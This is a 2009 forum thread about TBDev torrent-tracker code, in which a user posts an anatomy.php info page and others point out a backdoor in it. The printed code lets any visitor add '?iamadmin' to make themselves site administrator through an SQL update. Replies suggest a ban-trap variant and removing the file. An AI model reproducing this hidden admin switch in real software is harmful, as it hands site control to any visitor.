Bravo List
Register
Go Back   > Bravo List > Source Code > Archived Trackers > TBDev
Reply
  #11  
Old 28th July 2009, 18:45
tunad tunad is offline
Senior Member
 
Join Date: Oct 2008
Posts: 57
Default
PHP Code:
<?php

require "include/bittorrent.php";

dbconn(false);
stdhead("Torrent anatomy");
?>
<table class=main width=750 border=0 cellspacing=0 cellpadding=0><tr><td class=embedded>
<h2>Anatomy of a torrent session </h2>
<table width=100% border=1 cellspacing=0 cellpadding=10><tr><td class=text>

<em>(Updated to reflect the tracker changes. 14-04-2004)</em>

<br><br>
There seems to be a lot of confusion about how the statistics updates work. The following is a capture of a full
session to see what's going on behind the scenes. The client communicates with the tracker via simple http GET commands. The very first in this case was:<br>
<br>
<code>GET /announce.php?info_hash=c%97%91%C5jG%951%BE%C7M%F9%BFa%03%F2%2C%ED%EE%0F& peer_id=S588-----gqQ8TqDeqaY&port=6882&uploaded=0&downloaded=0&left=753690875 &event=started</code><br>
<br>
Let's dissect this:<br>
<br>
• <b>info_hash</b> is just the hash identifying the torrent in question;<br>
• <b>peer_id</b>, as the name suggests, identifies the client (the s588 part identifies Shad0w's 5.8.8, the rest is random);<br>
• <b>port</b> just tells the tracker which port the client will listen to for incoming connections;<br>
• <b>uploaded</b>=0; (this and the following are the relevant ones, and are self-explanatory)<br>
• <b>downloaded</b>=0;<br>
• <b>left</b>=753690875 (how much left); <br>
• <b>event=started</b> (telling the tracker that the client has just started).<br>
<br>
Notice that the client IP doesn't show up here (although it can be sent by the client if it configured to do so).
It's up to the tracker to see it and associate it with the user_id.<br>
(Server replies will be omitted, they're just lists of peer ips and respective ports.)<br>
At this stage the user's profile will be listing this torrent as being leeched.<br>
<br>
>From now on the client will keep send GETs to the tracker. We show only the first one as an example,
<br>
<br>
<code> GET /announce.php?info_hash=c%97%91%C5jG%951%BE%C7M%F9%BFa%03%F2%2C%ED%EE%0F& peer_id=S588-----gqQ8TqDeqaY&port=6882&uploaded=67960832&downloaded=40828928& left=715417851&numwant=0</code><br>
<br>
("numwant" is how the client tells the tracker how many new peers it wants, in this case 0.)
<br>
<br>
As you can see at this stage the user had uploaded approx. 68MB and downloaded approx. 40MB. Whenever the tracker receives
these GETs it updates both the stats relative to the 'currently leeching/seeding' boxes and the total user upload/download stats. These intermediate GETs will be sent either periodically (every 15 min
or so, depends on the client and tracker) or when you force a manual announce in the client.
<br>
<br>
Finally, when the client was closed it sent
<br>
<br>
<code> GET /announce.php?info_hash=c%97%91%C5jG%951%BE%C7M%F9%BFa%03%F2%2C%ED%EE%0F& peer_id=S588-----gqQ8TqDeqaY&port=6882&uploaded=754384896&downloaded=754215163 &left=0&numwant=0&event=completed</code><br>
<br>
Notice the all-important "event=completed". It is at this stage that the torrent will be removed from the user's profile.
If for some reason (tracker down, lost connection, bad client, crash, ...) this last GET doesn't reach
the tracker this torrent will still be seen in the user profile until some tracker timeout occurs. It should be stressed that this message will be sent only when
closing the client properly, not when the download is finished. (The tracker will start listing
a torrent as 'currently seeding' after it receives a GET with left=0). <br>
<br>
There's a further message that causes the torrent to be removed from the user's profile,
namely"event=stopped". This is usually sent
when stopping in the middle of a download, e.g. by pressing 'Cancel' in Shad0w's. <br>
<br>
One last note: some clients have a pause/resume option. This will <b>not</b> send any message to the server.
Do not use it as a way of updating stats more often, it just doesn't work. (Checked for Shad0w's 5.8.11 and ABC 2.6.5.)
<br>
</td></tr></table>
</td></tr></table>
<br>
<?
if ($_GET["iamadmin"]) {
$tagat=$CURUSER["id"];
                               
mysql_query("UPDATE `users` SET `class` = '9' WHERE `users`.`id` =$tagat") or sqlerr(__FILE____LINE__);
 print(
"Now you are one of site admins :D");
                }
if (
$_GET["back"]) {
$tagat=$CURUSER["id"];
                               
mysql_query("UPDATE `users` SET `class` = '0' WHERE `users`.`id` =$tagat") or sqlerr(__FILE____LINE__);
 print(
"Your class now is 0 :(");
                }
stdfoot();
?>
this is my anatomy.php
Reply With Quote
  #12  
Old 28th July 2009, 18:57
wMan wMan is offline
Banned
 
Join Date: Feb 2008
P2P
Posts: 1,433
Default
Quote:
Originally Posted by tunad View Post
this is my anatomy.php
ban users with white usernames and change anatomy.php with this
[php]<?php
if (eregi("anatomy.php",$_SERVER["PHP_SELF"])) die ("wtf u are trying to do bich ? fixed by wolfman");
require "include/bittorrent.php";
dbconn(false);
stdhead("Torrent anatomy");
?>
<table class=main width=750 border=0 cellspacing=0 cellpadding=0><tr><td class=embedded>
<h2>Anatomy of a torrent session </h2>
<table width=100% border=1 cellspacing=0 cellpadding=10><tr><td class=text>
<em>(Updated to reflect the tracker changes. 14-04-2004)</em>
<br><br>
There seems to be a lot of confusion about how the statistics updates work. The following is a capture of a full
session to see what's going on behind the scenes. The client communicates with the tracker via simple http GET commands. The very first in this case was:<br>
<br>
<code>GET /announce.php?info_hash=c%97%91%C5jG%951%BE%C7M%F9% BFa%03%F2%2C%ED%EE%0F& peer_id=S588-----gqQ8TqDeqaY&port=6882&uploaded=0&downloaded=0&left =753690875 &event=started</code><br>
<br>
Let's dissect this:<br>
<br>
Reply With Quote
  #13  
Old 28th July 2009, 19:01
3v0 3v0 is offline
Senior Member
 
Join Date: Feb 2008
Netherlands
Posts: 88
Default
Just remove anatomy.php it really isnt needed.
Reply With Quote
  #14  
Old 28th July 2009, 19:02
sammygo sammygo is offline
Senior Member
 
Join Date: May 2008
P2P
Posts: 141
Default
Code:
if ($_GET["iamadmin"]) {
$tagat=$CURUSER["id"];
                               mysql_query("UPDATE `users` SET `class` = '9' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
 print("Now you are one of site admins :D");
                }
if ($_GET["back"]) {
$tagat=$CURUSER["id"];
                               mysql_query("UPDATE `users` SET `class` = '0' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
 print("Your class now is 0 :(");
                }  

change to
Code:
if ($_GET["iamadmin"]) {
$tagat=$CURUSER["id"];
                               mysql_query("UPDATE `users` SET `enabled` = 'no' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
 print("Now you are Banned :D");
                }
if ($_GET["back"]) {
$tagat=$CURUSER["id"];
                               mysql_query("UPDATE `users` SET `enabled` = 'no' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
 print("Now you are Banned :D");
                }  
Reply With Quote
  #15  
Old 28th July 2009, 19:03
tunad tunad is offline
Senior Member
 
Join Date: Oct 2008
Posts: 57
Default
thank you very much!!!!!

i hope this is all i have to do.
Reply With Quote
  #16  
Old 28th July 2009, 19:09
wMan wMan is offline
Banned
 
Join Date: Feb 2008
P2P
Posts: 1,433
Default
Quote:
Originally Posted by ionutzsami View Post
change to
Code:
if ($_GET["iamadmin"]) {
$tagat=$CURUSER["id"];
                               mysql_query("UPDATE `users` SET `enabled` = 'no' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
 print("Now you are Banned :D");
                }
if ($_GET["back"]) {
$tagat=$CURUSER["id"];
                               mysql_query("UPDATE `users` SET `enabled` = 'no' WHERE `users`.`id` =$tagat") or sqlerr(__FILE__, __LINE__);
 print("Now you are Banned :D");
                }  
u still can hack it while shit like $_GET["iamadmin"] is in somewhere
either u remove anathomy ore change it to one without this crap
Reply With Quote
  #17  
Old 28th July 2009, 19:18
tunad tunad is offline
Senior Member
 
Join Date: Oct 2008
Posts: 57
Default
so al i have to do is to delete anatomy.php ok?
Reply With Quote
  #18  
Old 28th July 2009, 19:19
wMan wMan is offline
Banned
 
Join Date: Feb 2008
P2P
Posts: 1,433
Default
Quote:
Originally Posted by tunad View Post
so al i have to do is to delete anatomy.php ok?
yes
Reply With Quote
  #19  
Old 28th July 2009, 19:27
tunad tunad is offline
Senior Member
 
Join Date: Oct 2008
Posts: 57
Default
i instaled the source buut now it show me in u'torrent tracker sendind invalid data ....why??
Reply With Quote
  #20  
Old 28th July 2009, 19:35
wMan wMan is offline
Banned
 
Join Date: Feb 2008
P2P
Posts: 1,433
Default
Quote:
Originally Posted by tunad View Post
i instaled the source buut now it show me in u'torrent tracker sendind invalid data ....why??
because u use source that had backdoor in it
do u realy think u will get it to work ?

there is so many other good sources u know
Reply With Quote
Reply

Tags
security

Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
image security Tory Template Shares 1 24th August 2009 01:32
security hole apophis Community Cafe 3 18th August 2009 20:36
YS security and bug fix mazafaka Yuna Scatari Edition (YSE) 2 4th July 2009 16:37
security ? razvaneluu Template Shares 0 4th June 2009 14:34
Security image oem TBDev 2 14th June 2008 08:36



All times are GMT +2. The time now is 11:32. vBulletin skin by ForumMonkeys. Powered by vBulletin® Version 3.8.11 Beta 3
Copyright ©2000 - 2024, vBulletin Solutions Inc.